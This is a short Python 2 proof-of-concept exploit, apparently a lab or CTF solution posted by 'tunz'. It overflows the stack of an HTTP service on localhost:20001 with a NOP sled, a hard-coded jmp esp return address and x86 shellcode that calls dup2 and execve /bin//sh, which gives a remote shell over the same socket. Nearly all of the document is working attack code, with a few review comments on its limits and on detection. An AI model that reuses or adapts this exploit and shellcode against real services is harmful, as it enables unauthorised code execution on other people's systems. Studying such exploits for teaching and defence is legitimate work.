from struct import *
from socket import *
import time
 
# Proof-of-concept exploit for a stack overflow in an HTTP service listening on
# localhost:20001 (Python 2 -- `print get` below is the statement form, so every
# "string" here is a byte string). The request line is padded to overwrite the
# saved return address with a `jmp esp` gadget, then execution lands in the
# shellcode placed after it on the stack.
#
# NOTE(review): this only works where the binary is non-PIE / loaded at a fixed
# address (hard-coded 0x8049f4f) and the stack is executable; NX/DEP and ASLR
# break it. From a detection standpoint the request is easy to spot: a GET
# target several hundred bytes long consisting mostly of 0x90 (NOP) bytes.

# Descriptor number of the accepted client socket inside the target process;
# it is patched into the dup2 shellcode below (0x41 is the placeholder byte).
fd=4
shellcode = "\x31\xc9\xb1\x02\x31\xdb\xb3\x41\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7" # dup2
# Replace the placeholder with the real fd. str.replace is global, but 0x41
# occurs exactly once in the stub above, so only the `mov bl` operand changes.
# The stub loops dup2(fd, 2), dup2(fd, 1), dup2(fd, 0) so the shell's standard
# streams are attached to the socket.
shellcode = shellcode.replace("\x41", chr(fd))
# bin/sh
# execve("/bin//sh", ["/bin//sh"], NULL) via int 0x80 (syscall 11).
shellcode += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"+\
"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
 
# Plain TCP connection to the vulnerable service on the local host.
s = socket(AF_INET, SOCK_STREAM)
s.connect(('localhost',20001))
#raw_input("go? ")
# Layout of the request target:
#   139 bytes of NOP sled -- presumably the distance from the start of the
#   overflowed buffer to the saved return address (not derivable from here),
#   the gadget address as a little-endian 32-bit value,
#   100 more NOPs as a landing zone for the jmp esp, then the shellcode.
buf = ""
buf += "GET "
buf += "\x90"*139
buf += pack('<I',0x8049f4f) # jmp esp
buf += "\x90" *100
buf += shellcode
buf += " HTTP/1.1"
# No CRLF terminator is sent; the target evidently stops parsing at the
# " HTTP/1.1" token (assumption -- confirm against the server's parser).
s.send(buf)
 
# If the overflow succeeded, the socket is now the shell's stdin/stdout, so
# a command can be written to it and its output read back.
s.send("id\n")
# Single recv: output longer than 1024 bytes, or arriving in several
# segments, would be truncated.
get = s.recv(1024)
print get
s.close()


posted by tunz